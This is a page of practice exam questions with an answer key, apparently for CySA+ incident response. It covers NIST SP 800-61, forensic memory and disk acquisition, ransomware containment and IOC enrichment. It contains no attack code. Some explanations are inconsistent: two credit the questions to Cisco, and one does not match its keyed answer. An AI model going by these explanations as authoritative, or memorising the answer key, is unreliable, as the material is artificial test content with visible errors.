During the preparation phase of the NIST SP 800-61 incident response lifecycle, which of the following is the MOST important activity to ensure effective incident response?

A.Using YARA rules to detect malware in the environment
B.Implementing network segmentation to limit lateral movement
C.Conducting a root cause analysis after each incident
D.Creating and training the incident response team
AnswerD

This is a core preparation activity that ensures the team is ready to respond.

Why this answer

Preparation includes creating and training the incident response team, acquiring tools, and establishing procedures. A well-trained team is critical to executing the response effectively.

62
MCQhard

During a forensic investigation, an analyst needs to acquire volatile memory from a compromised Linux server running a critical application. The server cannot be powered off. Which tool should the analyst use to capture memory with the least impact on the system?

A.LiME
B.avml
C.WinPmem
D.dd
AnswerA

LiME is designed for Linux memory acquisition and minimizes interference with the running system.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that captures memory with minimal footprint, suitable for live acquisition on Linux systems.

63
MCQmedium

After containing a ransomware incident, the incident response team is conducting post-incident activities. Which action is MOST important to prevent a similar attack in the future?

A.Sharing IOCs with other organizations via a threat intelligence platform
B.Reimaging all affected systems
C.Performing a root cause analysis and implementing remediation
D.Updating the incident response plan
AnswerC

This directly addresses the cause of the incident.

Why this answer

Conducting a root cause analysis identifies the underlying vulnerability or weakness that allowed the attack, enabling targeted remediation.

64
Multi-Selecthard

During a forensic investigation, an analyst must preserve evidence in accordance with forensic sound procedures. Which THREE of the following practices should the analyst follow? (Select THREE.)

Select 3 answers
A.Run a full antivirus scan on the target drive
B.Document all actions taken in a chain of custody form
C.Use a write blocker when imaging a hard drive
D.Create a cryptographic hash of the original media before imaging
E.Boot the system to ensure it is operational
AnswersB, C, D

Chain of custody ensures evidence admissibility.

Why this answer

Forensic sound procedures include using write blockers to prevent alteration, verifying integrity with hashes, and documenting the chain of custody. Running a live scan would alter data.

65
MCQhard

A security analyst is performing dynamic malware analysis using a sandbox. The analyst observes that the malware creates a scheduled task that executes a PowerShell command to download a payload from a remote server. Which of the following behavioral IOCs should be prioritized for detection?

A.The domain name of the remote server
B.The hash of the initial malware sample
C.The IP address of the remote server
D.The creation of a scheduled task
AnswerD

Scheduled task creation is a persistent and observable behavior across many environments.

Why this answer

The scheduled task creation is a persistent mechanism that can be detected via monitoring for new scheduled tasks.

66
MCQeasy

A security analyst receives an alert about a possible ransomware outbreak. Which short-term containment action should be performed FIRST to prevent further spread?

A.Disable the user account
B.Rebuild the system
C.Update antivirus signatures
D.Isolate the system from the network
AnswerD

Network isolation stops lateral movement and C2 communication immediately.

Why this answer

Network isolation (disconnecting the affected system from the network) is a quick short-term containment step that stops the ransomware from communicating with C2 or spreading laterally.

67
MCQmedium

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a finance workstation to a known malicious IP address at 2:00 AM. The analyst checks the firewall logs and sees a single connection. Which action should the analyst take FIRST according to NIST SP 800-61?

A.Validate the incident by reviewing additional data sources.
B.Run a full antivirus scan on the workstation.
C.Isolate the workstation from the network immediately.
D.Notify law enforcement per the incident response plan.
AnswerA

Validation ensures the alert is a true incident, reducing false positives.

Why this answer

NIST SP 800-61 emphasizes that during detection and analysis, the first step is to validate the incident as a true positive before escalating or containing. The analyst should confirm the alert is not a false positive by gathering additional evidence.

68
MCQmedium

A security analyst is triaging an alert indicating that a user's workstation has been infected with ransomware. The file server shows signs of encryption. The analyst needs to contain the incident. Which action should the analyst take FIRST to minimize damage?

A.Running a full antivirus scan on the workstation
B.Disabling the user's Active Directory account
C.Rebuilding the workstation from a known good image
D.Disconnecting the workstation from the network
AnswerD

This is a short-term containment action that isolates the compromised system.

Why this answer

Disconnecting the infected workstation from the network stops the ransomware from spreading to other systems via network shares.

69
MCQmedium

An incident responder is called to a server room where a critical database server is exhibiting signs of compromise. The responder must preserve evidence while preventing further damage. Which of the following is a short-term containment strategy that also preserves evidence?

A.Reboot the server into safe mode.
B.Disconnect the network cable from the server.
C.Power off the server to freeze the system state.
D.Run a memory dump with WinPmem before any action.
AnswerB

This isolates the server while preserving the current system state for forensics.

Why this answer

Disconnecting the network cable (Option B) is the correct short-term containment strategy because it immediately isolates the compromised database server from the network, preventing further lateral movement or data exfiltration, while preserving the volatile system state (memory, running processes, open network connections) for forensic analysis. This action stops active network-based attacks without altering the contents of RAM or disk, which is critical for evidence integrity.

Exam trap

Cisco often tests the distinction between containment and evidence preservation, and the trap here is that candidates confuse 'preserving evidence' with 'freezing the system state' (Option C) or 'acquiring memory first' (Option D), not realizing that immediate network isolation is the only action that both stops active damage and preserves volatile data without modification.

How to eliminate wrong answers

Option A is wrong because rebooting into safe mode will overwrite volatile memory (RAM) and modify system logs, destroying critical forensic evidence such as active network connections, running malware processes, and encryption keys. Option C is wrong because powering off the server causes a hard shutdown that erases all volatile memory data and may trigger anti-forensic mechanisms (e.g., self-deleting scripts), losing the most time-sensitive evidence. Option D is wrong because running a memory dump with WinPmem before any containment action is a forensic acquisition step, not a containment strategy; it takes time and does not stop ongoing damage or network-based attacks.

70
MCQmedium

During dynamic malware analysis in a sandbox, an analyst observes that the malware attempts to connect to a remote IP address on port 443, modifies the Windows registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and drops a DLL in the system32 folder. Which type of IOC is most indicative of persistence?

A.The registry modification to the Run key
B.The network connection over port 443
C.The remote IP address
D.The dropped DLL file hash
AnswerA

Run keys are classic persistence indicators.

Why this answer

The registry modification to HKCU\Software\Microsoft\Windows\CurrentVersion\Run is the most indicative of persistence because this specific key is designed to automatically launch programs when a user logs in. By adding a value here, the malware ensures it executes on every system startup, which is the definition of persistence. In contrast, network connections and file drops are common during execution but do not inherently guarantee re-execution after a reboot.

Exam trap

Cisco often tests the distinction between indicators of activity (network connections, file drops) and indicators of persistence (registry Run keys, scheduled tasks, services), and the trap here is that candidates confuse a common malware behavior (like connecting to a C2 server) with a mechanism that ensures the malware runs again after reboot.

How to eliminate wrong answers

Option B is wrong because a network connection over port 443 (HTTPS) indicates command-and-control communication or data exfiltration, not a mechanism to survive a reboot. Option C is wrong because the remote IP address is merely a destination for network activity and provides no information about automatic re-execution. Option D is wrong because the dropped DLL file hash is a file-based indicator of compromise (IOC) that identifies the malware sample, but the file alone does not ensure it will be loaded again after a restart without a persistence mechanism like a Run key or service.

71
MCQmedium

An analyst is investigating a suspected data breach and needs to preserve network logs. Which of the following actions is MOST appropriate?

A.Delete old logs to free space for new logs
B.Perform a packet capture (pcap) and store it on write-protected media
C.Forward logs to a remote syslog server
D.Copy the log files to a USB drive and analyze them
AnswerB

Creating a pcap and storing on write-protected media preserves the evidence in its original state.

Why this answer

To preserve network logs, the analyst should create a forensic copy (e.g., using netflow or packet capture) and store it on write-once media to prevent tampering.

72
MCQmedium

During a forensic investigation, an analyst creates a disk image using dd with a SHA256 hash. Later, the analyst needs to verify the integrity of the image before analysis. Which command should the analyst use to compare the original hash with a newly computed hash?

A.md5sum original.dd
B.dd if=image.dd | sha256sum
C.sha256sum image.dd
D.chksum -a sha256 image.dd
AnswerC

Computing the SHA256 hash of the image and comparing with the original ensures integrity.

Why this answer

Recomputing the hash with sha256sum and comparing it to the original verifies that the image has not been altered.

73
Multi-Selectmedium

A security team is responding to a suspected data breach involving exfiltration of customer data via email. During the containment phase, which TWO actions should the team perform to preserve evidence while preventing further data loss?

Select 2 answers
A.Disable the compromised user account.
B.Take a memory dump of the email server.
C.Rebuild the email server from backup.
D.Notify all customers immediately.
E.Apply all available patches to the email server.
AnswersA, B

Disabling the account stops further unauthorized access and data exfiltration.

Why this answer

Preserving email server logs is crucial for forensic analysis, and blocking the suspected email account stops further exfiltration.

74
MCQmedium

An organization has been experiencing repeated phishing attacks that bypass email filters. The incident response team wants to enhance detection by creating rules based on characteristics of the phishing emails. Which of the following IOCs would be most effective for detecting similar phishing campaigns?

A.Registry keys modified by the payload
B.File hashes of attached malware
C.IP addresses of the phishing servers
D.Email subject lines and sender domain
AnswerD

These are common across phishing campaigns and can be used to filter emails.

Why this answer

Email indicators such as subject lines, sender addresses, or embedded URLs are directly observable in emails and help identify phishing patterns.

75
Multi-Selecteasy

A security analyst is reviewing IOCs from a threat intelligence feed. The analyst wants to enrich the IOCs using open-source tools. Which THREE tools are commonly used for IOC enrichment? (Select three.)

Select 3 answers
A.WHOIS
B.Wireshark
C.VirusTotal
D.Shodan
E.Nmap
AnswersA, C, D

WHOIS looks up domain registration data.

Why this answer

VirusTotal provides file and URL reputation. Shodan gives information about exposed services. WHOIS reveals domain registration details.

These are standard enrichment sources.

Page 1 of 2 · 109 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Cysa Incident Response questions.